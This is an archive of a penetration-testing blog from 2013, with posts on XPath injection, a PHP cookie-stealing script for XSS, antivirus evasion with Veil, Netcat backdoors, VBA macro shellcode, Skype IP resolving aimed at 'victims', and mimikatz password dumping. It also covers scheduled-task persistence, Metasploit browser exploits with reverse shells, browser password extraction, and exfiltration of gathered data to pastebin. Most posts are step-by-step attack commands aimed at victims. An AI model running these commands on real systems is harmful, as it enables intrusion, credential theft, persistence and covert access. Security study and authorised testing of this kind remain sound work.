Wednesday, December 18, 2013

Creating custom username list & wordlist for bruteforciing.

2 comments
During brute-forcing every time you need custom  password list & username list. Username list is as well as important as password list, it should be unique for every organization.If we use traditional large number of username list , then it will be tedious process.Custom username list also useful in username enumeration.

Creating custom username list:-


(1)Jigsaw:-

During information gathering stage , you may use jigsaw script. It is great script for gathering employees `s details like fullname, position, department, email addresses.You should use script with your jigsaw credential.


some times email address`s initial can be username of employee.So you can get different username from output of jigsaw script.


(2)Username script:-

If you have full name of users then you can use username.py script to generate possible username by using different combination of first name & last name.


I also write bash script which generate possible username using first name, last name & birth date.


Friday, November 29, 2013

XPATH Injection Tutorial

2 comments
XPath is a language that has been designed and developed to operate on data that is described with XML. The XPath injection allows an attacker to inject XPath elements in a query that uses this language. Some of the possible goals are to bypass authentication or access information in an unauthorized manner.

We are gonna learn using simple example. Download code from here & put it in your local server directory.(Code is created by Amol Naik )

Sample XML Document which we gonna use:-

<Employees>
<!-- Employees Database -->
  <Employee ID="1">
    <FirstName>Johnny</FirstName>
    <LastName>Bravo</LastName>
    <UserName>jbravo</UserName>
    <Password>test123</Password>
    <Type>Admin</Type>
  </Employee>
  <Employee ID="2">
    <FirstName>Mark</FirstName>
    <LastName>Brown</LastName>
    <UserName>mbrown</UserName>
    <Password>demopass</Password>
    <Type>User</Type>
  </Employee>
  <Employee ID="3">
    <FirstName>William</FirstName>
    <LastName>Gates</LastName>
    <UserName>wgates</UserName>
    <Password>MSRocks!</Password>
    <Type>User</Type>
  </Employee>
  <Employee ID="4">
    <FirstName>Chris</FirstName>
    <LastName>Dawes</LastName>
    <UserName>cdawes</UserName>
    <Password>letmein</Password>
    <Type>User</Type>
  </Employee>
</Employees>

Bypass Authentication:-


Browse to the login.php page; here we can see simple login form.

Bypass Authentication

If the application does not properly filter such input, the tester will be able to inject XPath code and interfere with the query result. For instance, the tester could input the following values:

Username: ' or '1' = '1
Password:  ' or '1' = '1

Bypass Authentication using XPATH injection

Wednesday, November 20, 2013

Broken Authentication & Session Management in Mutillidae

1 comments
Broken Authentication and Session Management is on number 2 in OWASP Top 10 vulnerability list 2013. In mutillidae , it contain three subsection.

  • Authentication Bypass
  • Privilege Escalation
  • Username Enumeration

We have already covered Username enumeration in last article & we got valid username list which exist in database. Today we are going to use authentication bypass method.

  1. Using cookie
  2. Using brute-force
  3. Using SQL injection

(1)Authentication Bypass using cookie:- 

As we know that , mutillidae is vulnerable to XSS, so we can capture cookie with help of XSS. We are going to take advantage of persistent XSS.

http://127.0.0.1/mutillidae/index.php?page=add-to-your-blog.php

Above link is vulnerable to persistent XSS attack. We can submit html to add blog section.so we are going to use cookie-catcher.

Content of cookie_catcher.php :-

<?php
header ("Location: http://192.168.56.1");
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");;
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.html', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
?>

Upload your cookie_catcher.php to server. For demo i used my local apache server & after execution of script it will redirect to 192.168.56.1.You can change the code according to your need. It will grab IP, cookie, Referer, time & date.

Saturday, November 16, 2013

How to solve compile error in veil?

0 comments
As you know, veil is AV evasion framework for metasploit payload. On the 15th of every month, for the next year, at least one new payload module will be released.Yesterday they released two new payload.

  1. pure windows/meterpreter/reverse_tcp stager, no shellcode
  2. pure windows/meterpreter/reverse_tcp windows service stager compatible with psexec, no shellcode

Compiler Error in c payloads:-


 Available c payloads:

    VirtualAlloc                         Poor
    VoidPointer                         Poor
    meter_rev_tcp                     Excellent
    meter_rev_tcp_service        Excellent

c/meter_rev_tcp

I used c/meter_rev_tcp. After setting of LHOST & LPORT ; when i try to generate it ; i got error.

Monday, November 11, 2013

Username Enumeration in Mutillidae using Burpe Intruder.

0 comments
Mutillidae  is a free, open source, vulnerable web-application providing a target for web-security tester. Mutillidae can be installed on Linux and Windows using LAMP, WAMP, and XAMMP.

Username Enumeration :- We have an application that will reveal to us when a username exists on the system which can be used in further step like brute-force account.

In Mutilliade login page , when you provide valid username & invalid password , web-application reply us that password incorrect.

Username Enumeration


When we provide invalid username ; then application tell us that Account does not exist.

Username Enumeration Mutillidae

So by monitoring web-application message one can know that username is valid or not.

First we will examine source code of page ; when we provide valid username reply is "var lAuthenticationAttemptResultFlag = 1" & when we provide invalid username reply is "var lAuthenticationAttemptResultFlag = 0"

var lAuthenticationAttemptResultFlag = 1    It means username exist.

var lAuthenticationAttemptResultFlag = 0    It means username does not exist.

Wednesday, October 30, 2013

List of Differnet AV evasion Frameworks.

5 comments
Today we are gonna talk about different AV evasion frameworks for metasploit payload & how to use them? It`s very imporatant when you know which AV you have to bypass, because we don`t have to worry about FUD. Some payload can bypass specific AV ; while other AV can not be bypassed using that payload.

(1)Veil:-


Veil is python based tool which create FUD payload , One of the best framework for AV evasion. On the 15th of every month, at least one new payload module will be released.

Click here for how to install & use Veil?

(2)AV0id :-


Anti-Virus Bypass Metasploit Payload Generator Script.

wget https://github.com/nccgroup/metasploitavevasion/archive/master.zip
unzip master.zip
cd metasploitavevasion-master/
./avoid.sh

Antivirus Evasion

Thursday, October 24, 2013

Backdoor using Netcat, cryptcat , ncat.

3 comments
Today we are gonna talk about Netcat & its alternative ; i assume that all of you are familiar with Netcat. If not than read here.  Also i assume that you have already open port 455 using following command.

netsh firewall add portopening TCP 455 "Service Firewall" ENABLE ALL

Attacker `s I.P : 192.168.56.1

Victim`s I.P.     : 192.168.56.101

We will talk about Netcat, cryptcat & ncat.

(A)Netcat:-


Netcat is used as backdoor. After gaining access to machine , we are creating "netcat" as startup service using changes to the system registry . And then we are gonna open port for communication. At attacker side just start  netcat listener. Here is tutorial on how to create netcat backdoor?

But if you know about method used in that tutorial ; there are some disadvantages of using netcat.

(1)Most of AV flag netcat as hacking tool :- I know You can use crypter , but still general behavior detection  possible by AV.

netcat-virustotal


(2)Clear text communication (No encryption):-anyone from same network can view your communication.Also due to clear text communication firewall or AV can popup & block our communication.

netcat-capture-traffic-using-wireshark

Friday, October 18, 2013

Get shell Using Shellcode in Macro.

2 comments
We can execute shellcode directly in macro. It`s very old method, but still it`s useful ; because AV don`t trigger it.First we will generate VB code of our payload.

msfconsole
use payload/windows/meterpreter/reverse_tcp
set LHOST 192.168.56.102
set LPORT 443
generate -t vba
exploit

Monday, October 14, 2013

How to detect Avast Antivirus remotely?

0 comments
During assessment if you know which Anti virus is used by client then you won half battle.Because you can download trial version of that AV & install it in virtual box & try to bypass that AV. So during real assessment your payload or binary don`t get caught.Today we gonna try to detect if client has installed avast or not?

Original video is posted here. In avast their is feature of site blocking ; so if you want to block any site you can put its address in block url section of avast interface.when someone load that site they get response as shown in below image.

How-to-detect-Avast-Antivirus-remotely

Friday, October 11, 2013

Fun with skype resolver

3 comments
Skype resolvers are used by hackers to get Skype users IP addresses, when a hacker get a users IP address they usually hit them off or DDoS them.

If your victim is in your friend-list & you are using linux ; then it`s very simple to get his I.P.

netstat -tupan | grep skype > n1

Now chat with your victim; as soon as you got reply use following command.

netstat -tupan | grep skype > n2

diff n1 n2

Now we have I.P. of victim.

In most situation our victim is not in our friend-list. So for that situation, we will going to use online skype resolver.You can also use bash script for getting ip of victim which i wrote.

root@bt:~# git clone https://github.com/niravkdesai/skypersolver.sh

root@bt:~# cd skypersolver.sh/

root@bt:~/skypersolver.sh# sh skypersolver.sh


Use one of following  links to get I.P. of your victim using his skype user-name.

(1)http://www.skyperesolver.com/

(2)http://skresolver.com/

(3)http://www.speedresolve.com/resolve.php

(4)http://skypegrab.com/skype-beta

(5)http://iskyperesolve.com/

Okay we got I.P. Now you can directly DOS or DDOS( ddos and dos attacks are illegal) them . But we are going to use different technique to shutdown your victim pc using RDP.

First scan ip to find open ports of victim.

root@bt:~# nmap 192.168.56.101

Starting Nmap 6.40 ( http://nmap.org ) at 2013-10-11 18:41 IST
Nmap scan report for 192.168.56.101
Host is up (0.00077s latency).
Not shown: 995 filtered ports
PORT      STATE  SERVICE
139/tcp     open   netbios-ssn
445/tcp     open   microsoft-ds
2869/tcp   closed icslap
3389/tcp   open   ms-wbt-server
10243/tcp closed unknown
MAC Address: 08:00:27:B3:A3:80 (Cadmus Computer Systems)

nmap-scan

Monday, October 7, 2013

Get shell using Missing Autoruns.

0 comments
In previous post we saw that how can we execute schedule task after compromised PC.Today we will see another method to maintaining access of compromised pc.

(A)When we install program in windows environment , some of them are asking to run at startup times. So these program write its value to windows registry & whenever pc is restarted , program will run in background.When uninstallation of program is not completed ; then it fails to remove its value from registry. So it`s called Missing Autoruns.

After compromised pc ; we have to find missing autoruns in victim machine.For this purpose we will use sysinternal `s autorunsc.exe.

(1)Get meterpreter shell.

(2)Upload sysinternal`s autoruns.exe & autorun.exe to victim machine.

(3)Now from uploaded directory execute following command to get missing autoruns of machine

autorunsc.exe -a | findstr /n /R "File\ not\ found"

(4)Now we have list of file which is missing ; these files are run at startup time.

missing-autoruns

Friday, October 4, 2013

Schedule Task in windows after Exploitation.

1 comments
Recently in Derbycon mubix & carnal0wnage present "windows attacks at is the new black ". It`s really great presentation . You can find it here. So i will put  their method here.

After getting meterpreter shell ; we have to maintain access of shell. You can use meterpreter backdoor & persistent backdoor . But most of times it will caught by AV. You can create FUD payload using Veil.We can also create schedule task for our backdoor.

First create one batch file , put following code in it

@echo off
"C:\Documents and Settings\nirav\Desktop\backdoor.exe"


Then upload your backdoor & created batch file.Please adjust path of batch file according to your upload path of backdoor.

Get clear text password:-

Following are different methods to get clear text password of windows.

(1)using mimikatz or wce get clear text password of victim.

(2) You can also use mimikatz password dump method .

(3)You can also use mimikatz meterpreter plugin which i used in this tutorial.

   meterpreter > load mimikatz
   meterpreter > help mimikatz
   meterpreter > kerberos
   meterpreter > mimikatz_command -h
   meterpreter > mimikatz_command -f sekurlsa::logonPasswords -a "full"

(4)You can use wce & mimikatz in memory without uploading binary.

(a)WCE in memory:-

cd %systemroot%
cd system32
pwd
execute -H -m -d calc.exe -f /root/wce.exe -a "-o foo.txt"
cat foo.txt

(b)Mimikatz in memory:-

cd %systemroot%
cd system32
execute -H -i -c -m -d calc.exe -f /root/mimi/Win32/mimikatz.exe -a '"sekurlsa::logonPasswords full" exit'

get-clear-text-password
So till now i upload one batch file ; backdoor & get clear text password.

Now we are going to schedule our backdoor.We are going to use schtasks command. For detail option about schtasks visit here . In this tutorial i schedule my backdoor daily at 22:16. So everyday at 22:16 my backdoor will be executed & i will get shell.

C:\Documents and Settings\nirav> SchTasks /Create /SC DAILY /TN Evil2 /TR "\"C:\Documents and Settings\nirav\Desktop\sch.bat"" /ST 22:16:00

It will ask to enter password which we got before.

schedule-task

You can also use different option like ONIDLE, ONLOGON, and ONSTART & execute different binary according to your need.

Tuesday, October 1, 2013

Exploit For All IE version(CVE-2013-3893).

0 comments
Recently the public has shown a lot of interest in the new Internet Explorer vulnerability (CVE-2013-3893) that has been exploited in the wild, which was initially discovered in Japan. At the time of this writing there is still no patch available, but there is still at least a temporary fix-it that you can apply from Microsoft, which can be downloaded here.

This module exploits a use-after-free vulnerability that currents targets Internet Explorer 9 on Windows 7, but the flaw should exist in versions 6/7/8/9/10/11. It was initially found in the wild in Japan, but other regions such as English, Chinese, Korean, etc, were targeted as well.

For more technical Detail view metasploit blog here

The Metasploit module currently can be only tested on Internet Explorer 9 on Windows 7 SP1 with either Office 2007 or Office 2010 installed,


msf > use exploit/windows/browser/ie_setmousecapture_uaf
msf exploit(ie_setmousecapture_uaf) > set srvhost 192.168.56.1
srvhost => 192.168.56.1
msf exploit(ie_setmousecapture_uaf) > set uripath /
uripath => /
msf exploit(ie_setmousecapture_uaf) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ie_setmousecapture_uaf) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf exploit(ie_setmousecapture_uaf) > set lport 443
lport => 443
msf exploit(ie_setmousecapture_uaf) > run
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.56.1:443
[*] Using URL: http://192.168.56.1:8080/
[*] Server started.


Send this link to victim. As soon as he open link you will get meterpreter shell.

exploit-for-CVE-2013-3893

Saturday, September 28, 2013

Hack local network PC using windows theam file.

0 comments
This module exploits a vulnerability mainly affecting Microsoft
Windows XP and Windows 2003. The vulnerability exists in the
handling of the Screen Saver path, in the [boot] section. An
arbitrary path can be used as screen saver, including a remote SMB
resource, which allows for remote code execution when a malicious
.theme file is opened, and the "Screen Saver" tab is viewed. The
code execution is also triggered if the victim installs the
malicious theme and stays away from the computer, when Windows tries
to display the screensaver.

Available targets:
  Id  Name
  --  ----
  0   Windows XP SP3 / Windows 2003 SP2


msf > use exploit/windows/fileformat/ms13_071_theme
msf exploit(ms13_071_theme) > set srvhost 192.168.56.1
srvhost => 192.168.56.1
msf exploit(ms13_071_theme) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms13_071_theme) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf exploit(ms13_071_theme) > run
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.56.1:4444
msf exploit(ms13_071_theme) > [*] Generating our malicious executable...
[*] Creating 'msf.theme' file ...
[+] msf.theme stored at /root/.msf4/local/msf.theme
[+] Let your victim open msf.theme
[*] Ready to deliver your payload on \\192.168.56.1\qggdxi\vleGT.scr
[*] Server started.

windows-xp-infected-theam-file

Wednesday, September 18, 2013

Extract & decrypt Chrome & IE passwords from Remote PC

0 comments
In previous post i mentioned how we can extract saved passwords from firefox & thunderbird from rempote PC. Today we are going to extract saved passwords from Google chrome & IE. If you want to know more technical detail you can visit this site.

Chrome stores all the sign-on secrets into the internal database file called 'Web data' in the current user profile folder. Newer version has moved the login passwords related database into new file named 'Login Data'.  DPAPI encrypts data based on either the DPAPI_SYSTEM values stored in LSA secrets or the user’s password, you can’t copy the database file to another machine and decrypt without using special tools as we did in case of mozilla.


First download tool ChromePasswordDecryptor from here .

Installed it in windows.We are only interested in windows binary which is located on C:\Program Files\SecurityXploded . So from that directory copy binary ChromePasswordDecryptor.exe to our main OS(Backtrack).

We are going to use two method to extract saved passwords from browser.

(A)In this method we are going to upload our binary to victim pc using meterpreter shell & then we execute it.

(1)Get meterpreter shell.

(2)Upload ChromePasswordDecryptor.exe (Which we copy into Backtract from windows) to victim.

(3)Execute it from shell using following command.
    ChromePasswordDecryptor.exe "pwd.txt"

Tuesday, September 17, 2013

Extract & decrypt passwords from Firefox & Thunderbird.

2 comments
Today we are going to extract password from Fireox & Thunderbird which are saved in browser and then try to decrypt that passwords from remote PC. Before some times ; i posted here that how to extract information from saved sqlite database of skype, firefox, chrome using python script.

Most of the morden browser save information in sqlite format. When user enter login information ; firefox asked user to remember password.If user click on remember password then this passwords are saved into firefox database in signons.sqlite. But passwords are encrypted. so just by downloading signons.sqlite we can not extract passwords from it. Signons.sqlite is useless without the key3.db file, which also resides in the profile folder of your application. Passwords in the signons.sqlite file is encrypted with TripleDES in CBC mode. The key used for the encryption is saved in key3.db and encrypted as well.

Firefox Database path in windows:-

[Windows XP]
C:\Documents and Settings\<user_name>\Application Data\Mozilla\Firefox\<random_name>.default

[Windows Vista & Windows 7]
C:\Users\<user_name>\AppData\Roaming\Mozilla\Firefox\<random_name>.default

Firefox Database path in linux
/root/.Mozilla/Firefox/Profile/<random_name>.default

First we have to get meterpreter shell using any known vulnerability or using any metasploit method.

download_creds

Then we have to download three files from remote PC which are key3.db,signons.sqlite;cert8.db.You can use metasploit post module (use post/multi/gather/firefox_creds)for downloading this file or you can also download manually by browsing directory.

download_creds

Wednesday, September 11, 2013

Pentesting of coldfusion web-application.

0 comments
ColdFusion is a commercial rapid web application development platform.
CFML = ColdFusion Markup Language

ColdFusion = Adobe’s product that handles CFML page/libs
– Runs on Windows, Solaris, HP/UX and Linux
– Apache, IIS, Jrun
  
Following modules are Available in metasploit for coldfusion.

msf > search coldfusion

auxiliary/gather/coldfusion_pwd_props             
auxiliary/scanner/coldfusion_rds_check                                         
auxiliary/scanner/http/cold_fusion_version                             
auxiliary/scanner/http/coldfusion_locale_traversal                 
exploit/windows/http/coldfusion_fckeditor     


Following documents are available for pentesting of coldfusion web-application

ColdFusion for Penetration Testers


ColdFusion Web Shell

If you have good document available for pentesting of coldfusion web-application ; please let me know. We will add it.

Sunday, September 1, 2013

Exploit for IE 9 on Windows 7 SP1

1 comments
This is a memory corruption bug found in Microsoft Internet Explorer. On IE 9, it seems to only affect certain releases of mshtml.dll. For example: This module can be used against version  9.0.8112.16446

Target
IE 9 on Windows 7 SP1 (mshtml 9.0.8112.16446)

msf > use exploit/windows/browser/ms13_059_cflatmarkuppointer

msf exploit(ms13_059_cflatmarkuppointer) > set srvhost 192.168.56.1
srvhost => 192.168.56.1
msf exploit(ms13_059_cflatmarkuppointer) > set uripath /
uripath => /
msf exploit(ms13_059_cflatmarkuppointer) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf exploit(ms13_059_cflatmarkuppointer) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms13_059_cflatmarkuppointer) > run
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.56.1:4444
msf exploit(ms13_059_cflatmarkuppointer) > [*] Using URL: http://192.168.56.1:8080/
[*] Server started.

Now send that link to victim; as soon as he open link; you will get meterpreter shell.
ie9-exploit

Thursday, August 29, 2013

Access backtrack from remote computer using ssh & vnc.

0 comments
If  you want to access your local computer through remote computer ; first you need configure ssh daemon .Because nowadays people are not using telnet due to plain text protocol.

How to configure ssh in Backtrack 5 r3?


(1)First we have to generate ssh key.So type following in terminal.

ssh-keygen

It will generate public/private rsa key pair.By default location of keys is /root/.ssh/id_rsa

(2)Now we will move this generated keys in ssh folder.

cd /etc/ssh
mkdir keys

(3)Now copy generated keys from /root/.ssh/id_rsa & paste into keys folder which we create in second step.

(4)Now type following command in terminal
 dpkg-reconfigure openssh-server


(5)Now we have to start ssh daemon ; so type following in terminal
service ssh start
 
(6)Now everything is setup ; you can use your ssh server via remote machine.
For windows you can also use putty like software.If you are on linux machine than type following command.
ssh -l "username" 192.168.56.1(i.p.)

ssh-solution-backtrack

Tuesday, August 27, 2013

Exploit Oracle Endeca Server with metasploit.

0 comments

This module exploits a command injection vulnerability on the Oracle  Endeca Server 7.4.0. The vulnerability exists on the createDataStore  method from the controlSoapBinding web service. The vulnerable method only exists on the 7.4.0 branch and isn't available on the 7.5.5.1 branch. On the other hand, the injection has been found to be Windows specific. This module has been tested successfully on Endeca Server 7.4.0.787 over Windows 2008 R2 (64 bits).

First run ./msfupdate or git pull to update metasploit.

Now when you open metasploit & found error like this
[-]     /opt/msf/modules/exploits/windows/http/oracle_endeca_exec.rb: NameError uninitialized constant Msf::Exploit::Powershell .

Open oracle_endeca_exec.rb file in any editor.
Add this line require 'msf/core/exploit/powershell' after require 'msf/core'.
So it look like
require 'msf/core'
require 'msf/core/exploit/powershell'
Save it & open metasploit again.

Exploit target:

   Id  Name
   --  ----
   0   Oracle Endeca Server 7.4.0 / Microsoft Windows 2008 R2 64 bits

msf > use exploit/windows/http/oracle_endeca_exec
msf exploit(oracle_endeca_exec) > set rhost 192.168.56.101(victim`s i.p.)
rhost => 192.168.56.101
msf exploit(oracle_endeca_exec) > run

Exploit-Oracle-Endeca-Server

Sunday, August 25, 2013

How to get plain text source from shc compiled bash script?

1 comments
Shc is used to protect your shell script from modification or inspection. If you created bash script want to distribute it , but dono`t want them to easily readble by other people , then you can use it.

First we see how to compiled bash script to binary?


wget http://www.datsi.fi.upm.es/~frosal/sources/shc-3.8.7.tgz

tar -xvzf shc-3.8.7.tgz

cd shc-3.8.7

make

./shc

You can see shc usage message.
shc Usage: shc [-e date] [-m addr] [-i iopt] [-x cmnd] [-l lopt] [-rvDTCAh] -f script

Now we have script which we want to convert in binary.

./shc -f /script_path

So now you can see that it will convert plain text bash source into binary which extension is  .sh.x.


How to retrieve plain text from binary?


The shc compiled binary decrypts and loads the script into memory when started right after we started the binary, just segfault it and retrieve our script from the core dump.


Core dumps are often used to  debug errors in Linux or UNIX programs. A core file is generated when an application program abnormally terminates due to bug, operating system security protection schema, or program simply try to write beyond the area of memory it has allocated.

By default most of linux distributions turn off core file creation.
So we need to turn on core file creation.

ulimit -c

If output is zero means that core file is not created.

Now we set core file size limit to 70000 byte

ulimit -c 70000

Now we start binary & segfault it right away.I used IP-Digger binary to get plain text from it.

./IP-Digger4.sh.x&  ( sleep 0.02 && kill -SIGSEGV $! )

 sleep 0.02 will give the binary enough time to start up and decrypt the original script. The variable $! contains the pid of the last background process started, so we can easily kill it with the segmentation fault signal SIGSEGV (same as kill -11 $!). 
+ segmentation fault (core dumped)  ./IP-Digger4.sh.x
cat core | strings >plain_text

shc-plain-text

Now open plain_text file which we created & find plain text source of bash script.I upload source code of ip-digger here .

But if your script is too large then adjust core file size.

Friday, August 23, 2013

Post exploitation & swaparoo backdoor.

0 comments
Today we are going to create valid RDP user in victim pc using two method.

(1)As usual get meterpreter session of victim using metasploit.We need system privilege So use getsystem .(getsystem will work in xp. But if victim has windows 7 than you have to use bypassuac module;it will work if victim has admin provilage.But most of time detecetd by AV. So you have to encode it. )

Now we use meterpreter script which create RDP useraccount for logon.
run getgui -u username -p password.

msf-post-exploitation

Now Useraccount has been created.You can use rdesktop command to connect with victim using created credentials.

rdesktop victim i.p.

Wednesday, August 21, 2013

Post exploitation using Nishang.

1 comments
Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security and post exploitation during Penetraion Tests. The scripts are written on the basis of requirement by the author during real Penetration Tests.

This framework is written by Nikhil Mittal who is also author of Kautilya framework.For more information you can visit his blog.

Today we will see some basic module from nishang framework for post exploitation.

This tutorial is about post exploitation so first get meterpreter shell using any metasploit method. If you are new than visit metasploit section of blog.

(1)Download nishang from here .
(2)Unzip it & put it in root directory.

meterpreter>shell
cd C:\\Users/victim
mkdir 123
exit

meterpreter>upload /root/nishang/ C:\\Users/victim/123

We upload all powershell script from our nishang folder to victim pc `s folder.


nishang-1

After upload we have to get shell.

meterpreter>shell
cd c://Windows\System32\WindowsPowerShell\v1.0


So now everything is set ; we execute our powershell script from our shell.

(1)First we use Information Gather module. It gather all informataion from victim pc & it has exifil option so gatherd information is directly uploaded to the pastebin;gmail.

So type following in our shell

powershell.exe -ExecutionPolicy Bypass -command C:\\Users/victim/123/Information_Gather.ps1 -exfil AIP_Of_Pastebin username password 1


nishang-1

Tuesday, August 20, 2013

Bypass AV using powershell method using batch file.

0 comments
In penetration testing first step is how we can bypass AV & make our payload FUD. Previously we saw that we can bypass AV using Veil.At that time we used python module.In veil there are four types of payload.C,C#,powershell and python. Today we use powershell module.

If you don`t aware about powershell ; then you can google it.It`s windows based scripting language like bash in linux.Most of AV cannot detect it.We use SET powershell module to bypass AV; you can also use veil module.

cd  /pentest/exploits/set/
./setoolkit

type 1 which is social engineering attack
After that type 10.

powershell-module

Then give your i.p. & port to connect reverse shell.

Now in figure you can see that it has been generated & stored in to /root/.set/reports/powershell . And we also start metasploit listener.If victim paste our generated payload in cmd then we can get meterpreter shell. But i think it`s hard to tell someone to copy something & paste into cmd. So we will create batch file of our payload.

Create Batch file of our Payload.


(1)open x86_powershell_injection.txt file from  /root/.set/reports/powershell.
(2)Add path of powershell in first line. For example your code is starting from powershell word just put C:\\windows/system32/windowspowershell/v1.0/ before it.
(3)If you want to hide text during execution put @echo off at start of script.
(4)copy all code from x86_powershell_injection.txt
(5)Create new file & paste code
(6)Save this file as .bat extension and send to victim

As soon as he open file we can get shell.

Friday, August 16, 2013

Mimikatz alpha to get clear text password via bat file without AV alert.

7 comments

Mimikatz is great tool to get cleat text password . it extract password from memory. If you want to use ; here is my previous tutorial . Also it include now in metasploit. But now most of Antivirus  detect it. So now we use another method to get clear text password using mimikatz alpha.

(1)It`s post exploitation method ;so first you have to get meterpreter session using metasploit. If you are new ; then visit metasploit section of blog. You also need admin access of box. So for that you can use bypassuac module of metasploit.

(2)First  download latest  mimikatz which contain alpha version of it from following link.
http://blog.gentilkiwi.com/downloads/mimikatz_trunk.7z

Then download process dump from following link
http://technet.microsoft.com/en-us/sysinternals/dd996900.aspx

(3)Now make one batch file name it to procdump.bat . paste following code into batch file.

@echo off
C:\windows\temp\procdump.exe -accepteula -ma lsass.exe C:\windows\temp\dump_file.dmp 2>&1

(4)Now from meterpreter session upload  procdump.bat & downloaded  procdump.exe file to C:\windows\temp folder.

(5)Now go to shell from meterpreter & if you are not in temp directory change it to the C:\windows\temp
Now here what we do is create scheduled task.So type following command in shell.

at \\192.168.1.3 20:55 C:\windows\temp\procdump.bat

mimikatz

Tuesday, August 13, 2013

Exploit for Firefox 17 in Windows XP sp3

2 comments
Recently Mozilla Firefox 0day possibly being used by the FBI in order to identify some users using Tor for crackdown on child pornography.Now exploit is available in metasploit. Use msfupdate to get it.


Exploit target:

   Id  Name
   --  ----
   0   Firefox 17 & Firefox 21 / Windows XP SP3


msf > use exploit/windows/browser/mozilla_firefox_onreadystatechange

msf exploit(mozilla_firefox_onreadystatechange) > set LHOST 180.215.222.190
LHOST => 180.215.222.190
msf exploit(mozilla_firefox_onreadystatechange) > set SRVHOST 180.215.222.190
SRVHOST => 180.215.222.190
msf exploit(mozilla_firefox_onreadystatechange) > set uripath /
uripath => /
msf exploit(mozilla_firefox_onreadystatechange) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(mozilla_firefox_onreadystatechange) > run
[*] Exploit running as background job.

[*] Started reverse handler on 180.215.222.190:4444
[*] Using URL: http://180.215.222.190:8080/
[*] Server started.
msf exploit(mozilla_firefox_onreadystatechange) >

firefox-exploit

Sunday, August 11, 2013

Bypass AV using Veil In Backtrack.

10 comments
Today this blog complete exactly one year.Before one year i started journey in security world & still now it`s going well.Ok get to the point.Most of time it happened that our payload is detected by AV ;we can use encoder to encode our payload ;So it can not be detected by AV. Today we show how we can bypass AV using Veil. Veil is python based tool which create FUD payload.

How to Download & use ?

wget https://github.com/ChrisTruncer/Veil/archive/master.zip
unzip master.zip
cd Veil-master/setup
chmod +x setup.sh
./setup.sh

It will download all required python package for generating payload.

Veil is officially supported in Kali linux ; But it`s python based tool so we can use it in any os which is able to execute python script. I used it in Backtrack 5.We have to make some change in generated veil.py file to get working in backtrack.
Open directory of veil & go to config and open veil.py.(In latest version of veil , open /etc/veil/settings.py) If you installed metasploit from binary package then Change  line of metasploit path to /opt/metasploit/apps/pro/msf3/ and save it.

Go to veil direcory & run
./Veil.py

  AV-bypass-using-veil 

Wednesday, August 7, 2013

Extract skype & firefox data after exploitation.

1 comments
Today we will see how can we extract skype username ; contacts details ;conversation;file transfer & also firefox history;cookies;google search from victim computer.

First of all it`s post  exploitation, So i don`t go deep in How to hack remote P.C.. if you want to learn than click here & read metasploit section of blog.So you have to hack remote computer using metasploit.

 I create simple payload ; encoded it so antivirus can not detect it.
msfcli

And then send link to victim , as soon as he download payload and execute it we get meterpreter shell.

meterpreter

Sunday, August 4, 2013

Extract email address from given domain.

2 comments
Yesterday i created simple script which extract email address from given Domain. We can gather email address from whois info; pgp key search ;domain name. With help of this script we can extract email address which are on the specified web page.In backtrack there is tool available which is uberharvester. It has many features ;  but for small website it takes too much time to extract information.But this script work fast for small website. Speed of script depends on loading time of website and number of web pages.

Script working in two mode.

(1)In first mode we have to supply sitemap of website, so script can crawl that webpage one by one & extract email address.
For example if your victim website is fakesite.com then go to http://xml-sitemaps.com/ & create sitemap & download it in text format and save it to same folder where script is located.

extract-email

Saturday, August 3, 2013

How to use Browser Exploitation Framework?

1 comments
The Browser Exploitation Framework (BeEF) is a penetration testing tool written in Ruby and designed to both showcase browser weaknesses as well as perform attacks both on and through the web browser. BeEF consists of a server application that manages the connected clients, known as “zombies”, and JavaScript “hooks” which run in the browser of target hosts.

Traditionally, the JavaScript hook is injected by the attacker into HTML code either through an attack such as Cross Site Scripting (XSS) or SQL Injection. Once the hook is processed by the browser, it beacons back home to the BeEF server, and will process JavaScript based commands sent from the BeEF server to the client.

The commands sent to the browser are triggered through modules running within the BeEF server. These modules send commands that do everything from fingerprinting browsers and plug-ins to allowing the attacker to proxy web traffic through the browser. Additional modules exist to perform tasks such as network scanning, browser keystroke logging, and cross protocol exploitation where HTTP requests can be sent to non-HTTP services with exploit payloads that will execute and return shells back to an attacker.

In backtrack Beef  has been installed.But it`s not latest version , so you have to clone git repository for latest installation.

git clone https://github.com/beefproject/beef.git

cd beef

gem install bundler

bundle install

./beef

beef

Wednesday, July 31, 2013

How to encrypt sensitive data?

0 comments
Encryption Wizard (EW) is a simple, strong, Java file and folder encryptor for protection of sensitive information (FOUO, Privacy Act, CUI, etc.). EW encrypts all file types for data-at-rest and data-in-transit protection. Without installation or elevated privileges, EW runs on Windows, Mac, Linux, Solaris, and other computers with Sun Java.

Backtrack 5 has already come with ewizard ; it `s located in the /pentest/misc/ewizard . But it`s not latest version so we have to download latest version

Download Ew-public from here

Extract zip file where you can see one java file ; & ewizard user manual which contained all information about how to use it to encrypt & decrypt your private data.

For linux user
java -jar EW-Public-3.3.5.jar

For windows user double click on jar file & you can also install from tools & click on install


encrypt_data
It open Encryption wizard.Now click on file menu & add folder or file to encrypt.




encrypt_data

Sunday, July 28, 2013

Extract metadata from file in Backtrack

0 comments
Metadata is stored in any document by authoring application which can be user-name ; comment ;creation date;modification date.Metadata is very important in computer Forensic ; well know hacker group Anonymous `s members are arrested due to metadata. Because they upload document without clearing metadata ; so by reading metadata we can find lots of juicy information.


Previous we saw how we can extract metadata using FOCA from website ; But we can also extract metadata from BACKTRACK using exiftool.

